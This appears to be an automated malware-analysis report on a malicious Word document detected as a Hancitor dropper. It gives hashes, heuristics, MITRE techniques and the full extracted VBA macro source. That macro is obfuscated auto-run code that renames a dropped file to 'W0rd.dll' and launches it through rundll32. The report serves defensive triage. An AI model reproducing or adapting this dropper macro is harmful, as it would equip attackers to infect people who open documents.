Office (OLE) malware analysis — malicious · d8057f01f2accd3d

MALICIOUS

Office (OLE)

411.5 KB Created: 2020-12-17 15:19:00 Authoring application: Microsoft Office Word First seen: 2021-06-04

MD5: 646e8048abeb66b9c2a427991fca8a4a SHA-1: 83632fb36670ef36bf5c42d0d87305a7563c86a4 SHA-256: d8057f01f2accd3d22f68cb8f782270fe82cda7d65b894522793214d66661498

610 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 Malicious File T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious Office document that exploits CVE-2007-3899 to execute embedded code. The Document_Open macro uses ShellExecute to run an embedded PE executable, likely a downloader or dropper. The ClamAV detection name 'Doc.Dropper.Hancitor-9845854-0' further supports its malicious nature as a dropper.

Heuristics 16

CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899

Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514

Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
ClamAV: Doc.Dropper.Hancitor-9845854-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

 glops = repid
Dim regsrva As New Shell32.Shell
yy = glops & yy & pushstr & "ll" & "," & "Dll" & "UnregisterServer"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

asdf = RootPath
Set fso = CreateObject(cheza & "p" & "ting.FileSystem" & "Object")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Reference to CreateProcess API high SC_STR_CREATEPROCESS

Reference to CreateProcess API
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3799 bytes
SHA-256: `09fbe9e99c29b5957293cf750a7e9b796404a68f985e20d90b88809a55a3f666`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Dim glbl As Integer Private Sub Document_Open() Dim yy As String Dim vxcv As Integer Dim hugs As Integer hugs = chek If hugs = 1 Then Else Call ssss Dim pushstr As String pushstr = "\W" & "0rd.d" Dim geto As String Dim pus As String pus = "xe" geto = "nd" Dim ter As String ter = "e" Dim jsd As String jsd = geto Dim hh As String hh = "32." & ter & pus Dim fps As String fps = "r" Dim fa As String fa = fps & "u" & jsd & "ll" & hh Dim glops As String glops = repid Dim regsrva As New Shell32.Shell yy = glops & yy & pushstr & "ll" & "," & "Dll" & "UnregisterServer" Call regsrva.ShellExecute(fa, yy, " ", SW_SHOWNORMAL) End If End Sub Attribute VB_Name = "Module10" Sub gotodown() Call gototwo Selection.TypeBackspace Selection.Copy End Sub Sub gototwo() Selection.MoveDown Unit:=wdLine, Count:=1 Selection.MoveRight Unit:=wdCharacter, Count:=5 Selection.MoveDown Unit:=wdLine, Count:=24 Selection.MoveRight Unit:=wdCharacter, Count:=50 Selection.MoveDown Unit:=wdLine, Count:=24 Selection.MoveRight Unit:=wdCharacter, Count:=5 Selection.MoveDown Unit:=wdLine, Count:=24 Selection.MoveRight Unit:=wdCharacter, Count:=50 End Sub Sub checkthe(sf As String) Dim pifpaf As String pifpaf = sf Dim pafh As String pafh = repid strFileExists = Dir(pifpaf & "\ya.wav") Dim nothings As String nothings = pafh If strFileExists = "" Then Else If Dir(nothings & "\" & "W0rd.dll") = "" Then Name sf & "\ya.wav" As ActiveDocument.AttachedTemplate.Path & "\" & "W0rd.dll" Else Exit Sub End If End If End Sub Function repid() repid = ActiveDocument.AttachedTemplate.Path End Function Attribute VB_Name = "Module12" Sub hi(myhome As String) Dim glog As String glog = ActiveDocument.AttachedTemplate.Path Dim fu As String fu = glog & "\W0rd.dll" Name myhome & "\ya.wav" As fu End Sub Attribute VB_Name = "Module11" Sub ssss() Dim ntgs Dim sda Call gotodown ntgs = 50 sda = 49 Dim jos While sda < 50 ntgs = ntgs - 1 If Dir(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then Else sda = 61 End If Wend Call Getme(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Local\Temp") Selection.TypeBackspace End Sub Attribute VB_Name = "Module1" Function Getme(RootPath As String) Dim hor As String Dim fso As Object Dim fld As Object Dim vhhs As Object Dim afs As String Dim myArr hor = repid Dim asdf Dim cheza As String cheza = "Scri" asdf = RootPath Set fso = CreateObject(cheza & "p" & "ting.FileSystem" & "Object") Set fld = fso.GetFolder(asdf) strFileExists = Dir(RootPath & "\ya.wav") If strFileExists = "" Then For Each vhhs In fld.SUBFOLDERS afs = vhhs Call checkthe(afs) myArr = Getme(vhhs.Path) Next Set vhhs = Nothing Getme = myArr Set fld = Nothing Set fso = Nothing Else If Dir(hor & "\W0rd.dll") = "" Then Call hi(RootPath) Else Exit Function End If End If End Function Function chek() Dim jsa As String jsa = repid Dim vzxx As String vzxx = jsa If Dir(vzxx & "\W0rd.dll") = "" Then chek = 0 Else chek = 1 End If End Function
`embedded_office_00021a71.exe`	embedded-pe	Office MZ+PE at offset 0x21A71	283535 bytes
SHA-256: `5a01becd235e137c1727b94a6f4fbe12215ec2e2f1b8f9707d0c5f599645983e`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1669701977/Ole10Native	243509 bytes
SHA-256: `202d1b381e0ba08de6a982612ef2a481817ebfbe26c19ee77cc9799071eaa587`

Open this report in the interactive analyzer, or submit your own file for analysis.